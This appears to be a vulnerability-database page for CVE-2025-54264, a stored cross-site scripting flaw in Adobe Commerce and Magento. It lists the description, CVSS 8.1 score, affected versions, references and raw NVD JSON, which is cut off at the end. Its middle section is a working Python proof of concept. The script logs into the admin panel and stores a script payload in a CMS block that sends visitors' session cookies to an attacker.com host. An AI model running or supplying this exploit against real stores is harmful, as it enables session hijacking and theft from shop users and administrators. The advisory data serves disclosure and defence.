CVE-2025-54264

Description

Adobe Commerce versions 2.4.9-alpha2, 2.4.8-p2, 2.4.7-p7, 2.4.6-p12, 2.4.5-p14, 2.4.4-p15 and earlier are affected by a stored Cross-Site Scripting (XSS) Cross-Site Scripting (XSS) vulnerability that could be abused by a high-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality, and integrity impact to high. Exploitation of this issue requires user interaction in that a victim must browse to the page containing the vulnerable field. Scope is changed.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:commerce:2.4.4:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce:2.4.4:p1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce:2.4.4:p10:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce:2.4.4:p11:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce:2.4.4:p12:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce_b2b:1.3.3:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce_b2b:1.3.3:p1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce_b2b:1.3.3:p10:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce_b2b:1.3.3:p11:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce_b2b:1.3.3:p12:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:magento:2.4.6:-:*:*:open_source:*:*:* - VULNERABLE

cpe:2.3:a:adobe:magento:2.4.6:p1:*:*:open_source:*:*:* - VULNERABLE

cpe:2.3:a:adobe:magento:2.4.6:p10:*:*:open_source:*:*:* - VULNERABLE

cpe:2.3:a:adobe:magento:2.4.6:p11:*:*:open_source:*:*:* - VULNERABLE

cpe:2.3:a:adobe:magento:2.4.6:p12:*:*:open_source:*:*:* - VULNERABLE

Adobe Commerce 2.4.9-alpha2

Adobe Commerce 2.4.8-p2

Adobe Commerce 2.4.7-p7

Adobe Commerce 2.4.6-p12

Adobe Commerce 2.4.5-p14

Adobe Commerce 2.4.4-p15

Adobe Commerce < 2.4.4-p15（更早版本）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-54264 - Adobe Commerce Stored XSS PoC
# This PoC demonstrates how a high-privileged attacker can inject
# malicious JavaScript into vulnerable form fields in Adobe Commerce.

import requests
from bs4 import BeautifulSoup

# Configuration
TARGET_URL = "https://target-adobe-commerce-site.com"
ADMIN_USERNAME = "attacker_admin"
ADMIN_PASSWORD = "password123"
MALICIOUS_PAYLOAD = '<script>document.location="https://attacker.com/steal?cookie="+document.cookie;</script>'

def exploit_stored_xss():
    """
    Step 1: Authenticate as a high-privileged admin user
    Step 2: Navigate to a vulnerable form field (e.g., product description,
            CMS block, category name, etc.)
    Step 3: Inject malicious JavaScript payload into the form field
    Step 4: Submit the form to store the payload persistently
    Step 5: When a victim visits the affected page, the script executes
    """
    session = requests.Session()

    # Step 1: Login as admin
    login_url = f"{TARGET_URL}/admin"
    login_page = session.get(login_url)
    soup = BeautifulSoup(login_page.text, 'html.parser')
    form_key = soup.find('input', {'name': 'form_key'})['value']

    login_data = {
        'login[username]': ADMIN_USERNAME,
        'login[password]': ADMIN_PASSWORD,
        'form_key': form_key
    }
    session.post(login_url, data=login_data)

    # Step 2 & 3: Inject payload into a vulnerable field
    # Example: Injecting into a CMS block or product field
    vulnerable_endpoint = f"{TARGET_URL}/admin/cms_block/save/"
    payload_data = {
        'title': 'Special Offer',
        'content': MALICIOUS_PAYLOAD,  # Stored XSS injection point
        'form_key': form_key
    }

    # Step 4: Submit and store the payload
    response = session.post(vulnerable_endpoint, data=payload_data)

    if response.status_code == 200:
        print("[+] Malicious payload stored successfully!")
        print("[+] Waiting for victim to visit the page...")
        print("[+] When victim browses the page, their session cookie will be exfiltrated")
    else:
        print("[-] Failed to store payload")

if __name__ == "__main__":
    exploit_stored_xss()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-54264
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-54264
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-54264/
[4] VulDB https://vuldb.com/cve/CVE-2025-54264
[5] https://helpx.adobe.com/security/products/magento/apsb25-94.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-54264", "sourceIdentifier": "[email protected]", "published": "2025-10-14T21:15:35.077", "lastModified": "2025-10-20T13:47:24.190", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Commerce versions 2.4.9-alpha2, 2.4.8-p2, 2.4.7-p7, 2.4.6-p12, 2.4.5-p14, 2.4.4-p15 and earlier are affected by a stored Cross-Site Scripting (XSS) Cross-Site Scripting (XSS) vulnerability that could be abused by a high-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality, and integrity impact to high. Exploitation of this issue requires user interaction in that a victim must browse to the page containing the vulnerable field. Scope is changed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:-:*:*:*:*:*:*", "matchCriteriaId": "D258D9EF-94FB-41F0-A7A5-7F66FA7A0055"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p1:*:*:*:*:*:*", "matchCriteriaId": "4E5CF6F0-2388-4D3F-8FE1-43B8AF148564"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p10:*:*:*:*:*:*", "matchCriteriaId": "1C3D7164-1C5F-40BC-9EEC-B0E00CD45808"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p11:*:*:*:*:*:*", "matchCriteriaId": "68AAE162-5957-42AF-BE20-40F341837FAC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p12:*:*:*:*:*:*", "matchCriteriaId": "D9D01159-3309-4F6B-93B0-2D89DDD33DEE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p13:*:*:*:*:*:*", "matchCriteriaId": "91736E79-D8E7-4AF2-8E01-A7B4EB8AD6F4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p14:*:*:*:*:*:*", "matchCriteriaId": "8412C043-64E7-4DFF-A303-13A6FE113BFB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p15:*:*:*:*:*:*", "matchCriteriaId": "BBDA2BCF-E784-4CF3-B30D-6FF5BEE2055F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p2:*:*:*:*:*:*", "matchCriteriaId": "D6D6F1A7-ABB5-4EDC-9EA8-98B74518847A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p3:*:*:*:*:*:*", "matchCriteriaId": "CFEBDDF2-6443-4482-83B2-3CD272CF599F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p4:*:*:*:*:*:*", "matchCriteriaId": "6661093F-8D22-450F-BC6C-A8894A52E6A9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p5:*:*:*:*:*:*", "matchCriteriaId": "2515DA6D-2E74-4A05-BD29-FEEF3322BCB6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p6:*:*:*:*:*:*", "matchCriteriaId": "69A1F1F7-E53C-40F3-B3D9-DC011FC353BF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p7:*:*:*:*:*:*", "matchCriteriaId": "6A56E96C-6CE5-442C-AA88-F0059B02B5E7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p8:*:*:*:*:*:*", "matchCriteriaId": "8867F510-201C-4199-8554-53DE156CE669"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p9:*:*:*:*:*:*", "matchCriteriaId": "23988132-DD4E-4968-B6B8-954122F76081"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:-:*:*:*:*:*:*", "matchCriteriaId": "9B07F7B2-E915-4EFF-8FFC-91143CEF082E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p1:*:*:*:*:*:*", "matchCriteriaId": "7F5E9DB6-1386-4274-8270-2FE0F0CAF7FD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p10:*:*:*:*:*:*", "matchCriteriaId": "5764CC97-C866-415D-A3A1-5B5B9E1C06A6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p11:*:*:*:*:*:*", "matchCriteriaId": "E82D10D8-2894-4E5B-B47B-F00964DD5CDE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p12:*:*:*:*:*:*", "matchCriteriaId": "B044F2D9-E888-4852-8A40-DCE688860ED3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p13:*:*:*:*:*:*", "matchCriteriaId": "6423C754-36F9-4680-9211-60940ED63E79"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p14:*:*:*:*:*:*", "matchCriteriaId": "3472064A-8C79-436B-965A-96834AE8D346"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p2:*:*:*:*:*:*", "matchCrit ... (truncated)